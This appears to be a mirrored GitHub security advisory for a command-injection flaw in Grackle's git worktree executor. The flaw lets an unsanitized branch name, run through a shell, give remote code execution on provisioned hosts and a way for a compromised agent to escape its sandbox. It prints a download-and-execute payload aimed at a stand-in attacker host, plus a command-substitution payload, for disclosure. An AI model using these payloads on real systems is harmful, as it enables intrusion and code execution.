GHSA-vv65-f55v-xm6g: Grackle has command/argument injection in the git worktree executor that enables RCE on provisioned hosts via an unsanitized task branch name (shell:true)
Summary
The default git executor used for all worktree operations spawns git through a shell, and the untrusted task branch name flows into the command unsanitized. A caller able to reach the PowerLine SpawnSession RPC (a malicious or compromised agent acting through the orchestration layer, or any client able to spawn a task) can achieve arbitrary command execution as the PowerLine user on every provisioned environment (SSH host, Docker container, or Codespace), escaping the agent sandbox.
This advisory bundles two related defects in worktree.ts (audit findings F1 and F13).
Affected versions
@grackle-ai/runtime-sdk (and reachable via @grackle-ai/powerline) at version 0.132.1 and earlier. All publishable packages are lockstep-versioned.
F1 — Command injection via shell:true (primary, High)
Location: packages/runtime-sdk/src/worktree.ts:22-28 (sink), :135-143 (branch → args). Source: packages/powerline/src/grpc-server.ts:112 (req.branch), packages/runtime-sdk/src/base-session.ts:60,137.
NODE_GIT_EXECUTOR.exec runs:
const shell = process.env.SHELL || true; // worktree.ts:24 — always truthy
const result = await execRaw("git", args, { ...options, shell });
When shell is truthy, Node does not pass args as a safe argv vector — it concatenates git + args into a single string run through sh -c with no escaping. The untrusted branch flows unvalidated from the SpawnSession gRPC request into:
["worktree", "add", "-b", branch, wtPath, startPoint] // worktree.ts:135-137
["worktree", "add", wtPath, branch] // fallback :143
sanitizeBranch() (worktree.ts:50) is applied only to compute the on-disk worktree directory path — *not* to the -b <branch> argument — so it provides zero protection at the injection sink.
Exploit: set a task branch to x;curl http://attacker/x.sh|sh;# or $(touch /tmp/pwned). ensureWorktree runs it under sh -c
Details
Original advisory: https://github.com/advisories/GHSA-vv65-f55v-xm6g
More from GitHub Security Advisories
- criticalGHSA-g936-7jqj-mwv8: TSDProxy: Internal proxy auth token forwarded to backend services enables management API …2026-07-10
- highGHSA-fpg8-7664-jc5q: melange: Incomplete package integrity verification allows data section substitution2026-07-10
- mediumGHSA-48rx-c7pg-q66r: Excon does not redact additional sensitive/risky headers when following redirects2026-07-10
- highGHSA-h4g2-xfmw-q2c9: Clauster: Non-loopback deployments can serve the dashboard unauthenticated when auth.enab…2026-07-10
- mediumGHSA-rqq5-2gf9-4w4q: Secure Headers: CSP directive injection via sandbox, plugin_types, and report_to when giv…2026-07-10